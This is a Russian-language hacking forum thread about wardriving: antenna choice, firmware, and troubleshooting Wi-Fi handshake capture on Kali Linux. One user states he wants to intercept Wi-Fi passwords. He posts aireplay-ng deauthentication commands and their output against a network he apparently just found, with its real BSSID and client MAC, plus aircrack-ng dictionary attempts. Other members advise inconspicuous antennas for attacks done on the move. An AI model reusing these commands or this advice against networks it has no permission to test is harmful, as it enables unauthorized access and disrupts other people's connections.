[Wi-Fi, BT] Задай вопрос - получи ответ!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by user100, 25 Apr 2015.

  1. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,818
    Likes Received:
    18,488
    Reputations:
    377
    Подойдут аппараты от Ubiquity например Bullet M2 (придется шить под OpenWRT). Но utp кабель ограничен по затуханию сигнала 100 метрами.
    Можете как альтернативу рассмотреть активный usb кабель, но длинна конечно тоже не на 300 м.
     
    _________________________
    gadgef, Olivia Dunham and Bolzen like this.
  2. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Добрый день.
    Как вы считаете какая антенна подойдёт для перехвата WiFi поролей, хендшейка и много другого интересного связанного с взломами с инетом. Есть какая-то разница между антеннами направленными и панельными?
     
  3. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    Еще можно присмотреться к TP-Link WA5210G и TP-Link WA7510N, их кстати можно перепрошить в Ubiquit. Вот только питание по витой паре на 200-300 метров тоже проблемно, так как напряжение упадет ниже плинтуса, нужно тянуть витую пару а коробку power of ethernet ставить уже перед самой крышей(точкой доступа).
     
    Bolzen likes this.
  4. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    Панельная антенна, это одна из разновидностей направленных антенн. Антенну можно сделать просто и легко, главное постараться, ну если руки совсем не пригодны для напильника, то можно и купить антенну. Панельки для нашего дела отлично подходят.
     
  5. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Добрый вечер.
    А в чем вообще отличие антен? Как подобрать?
    Все таки наверно вы правы без антены ни как не поймать хендшейк : Вот подтверждение
     
  6. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
  7. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    Антенны как автомобили, есть гоночные, есть грузовые, есть бизнесс-класс, есть для широких масс. Так и антенну нужно выбирать под задачу, нужен линк на 10-20 км, то это параболическое зеркало с двух сторон и точная настройка антенн друг на друга, нужен хак - панелька или незаметный патч, разведка местности - всенаправленный штырь. Для пробы можно попытаться сделать cantennu из нескафе или там тущенки какой... А так патчи для работы: на выезде - небольшой не привлекающий внимания патчик, для работы из дома дуал патч или квад патч.
     
  8. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    А что не так то, можно поподробней?
     
  9. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Все верно. Сегодня антену не купил не было времени.
    Пытаюсь с чем пока есть:
    случайно нашел
    Code:
    CH  9 ][ Elapsed: 7 mins ][ 2015-05-13 22:30 ][ fixed channel mon0: 10  
      
    BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
      
    F8:C0:91:14:07:03  -45  97  3779  537  0  9  54e  WPA  CCMP  PSK  akado751  
      
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe  
      
    F8:C0:91:14:07:03  C8:F7:33:50:5D:20  -64  0 - 6e  0  586 
    
    Проблема следующая все время фиксирует 10 канал, почему ifconfig wlan0 down не помогает, включаю, а через 10 сек снова появляется.
    Хотя отключить вроде получилось:
    Code:
    root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one
    22:26:01  Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel 10
    22:26:01  mon0 is on channel 10, but the AP uses channel 9
    root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one
    22:33:41  Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel -1
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    22:33:41  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:42  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:42  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:43  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:44  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:44  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:45  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:45  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:46  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    22:33:46  Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
    
    Хотя не уверен.
     
  10. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Ну, например, все скрипты для перехвата handshake нужно теперь переписывать т.к интерфейса mon0 больше нету. Тот же feedingbottle/inflator с закрытыми исходниками, отвалились. Как тут кто-то сказал, это теперь такая "фича":mad:
     
  11. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    Инфлятором не пользовался, а на счет скриптов передавал всегда как параметр интерфейс wlanX... А там уже как параметр можно использовать monX
    На всякий случай не буду торопиться с обновлением аиркряка, или оно с обновлением кали прилетает?
     
    Algierd likes this.
  12. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Также проверял, вроде получилось там один раз перехватать, как написанов в статье на этом сайте провераю на наличие хендшейков:
    Code:
    root@kali-Linux:~# aircrack-ng /root/h12.pcap
    Opening /root/h12.pcap
    Read 3 packets.
    
      #  BSSID  ESSID  Encryption
    
      1  F8:C0:91:14:07:03  akado751  WPA (0 handshake)
    
    Choosing first network as target.
    
    Opening /root/h12.pcap
    Please specify a dictionary (option -w).
    
    
    Quitting aircrack-ng...
    
    
    Фиг тебе пишет что нету как так там есть ключи 1-4 и 3-4 почему так
     
  13. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    Точно не подскажу, у меня Debian. Но на их форуме рекомендуют пока оставаться на старой версии. Я тоже оставлю 1.2 rc1 пока не будет найдено решение для rc2.
     
  14. Biship

    Biship Member

    Joined:
    30 Jan 2012
    Messages:
    37
    Likes Received:
    15
    Reputations:
    0
    У тебя похоже NetworkManager не остановлен и он управляет сетью, попробуй в его настройках снять галку управлять сетью или дай команду:
    airmon-ng check kill
     
  15. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Да исправил, но вот теперь что то перехватывается, пакеты ключаей 1-4 и 3-4 когда провераю есть ли там хендшейк:
    Code:
    root@kali-Linux:~# aircrack-ng /root/h12.pcap -w /root/wordlist.txt
    Opening /root/h12.pcap
    Read 6 packets.
    
      #  BSSID  ESSID  Encryption
    
      1  F8:C0:91:14:07:03  akado751  WPA (0 handshake)
    
    Choosing first network as target.
    
    Opening /root/h12.pcap
    No valid WPA handshakes found..
    
    
    Quitting aircrack-ng...
    
    то ни как ни чего не получается
     
  16. koligar

    koligar New Member

    Joined:
    9 May 2015
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Не плохо себя зарекомендовала панельная антенна FA-20, чертежи которой можно найти в интернете.
     
  17. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Спачибо, гляну.
     
  18. Bolzen

    Bolzen New Member

    Joined:
    13 May 2015
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Все же выходит бюджетнее, практичнее и меньше потерь, чем в коаксиальном кабеле.
     
  19. koligar

    koligar New Member

    Joined:
    9 May 2015
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Если будут проблемы с поиском чертежей или с изготовлением, сообщи я с разрешения модераторов выложу.
     
    StR1D likes this.
  20. Bolzen

    Bolzen New Member

    Joined:
    13 May 2015
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Это все же не то решение, Вы предлагаете мне поставить программы airodump-ng и т.п. на память роутера и с помощью удаленки заходить на него. Но мне нужно решение, чтобы такое устройство, при подключении к компьютеру определялось в kali непосредственно как wlan.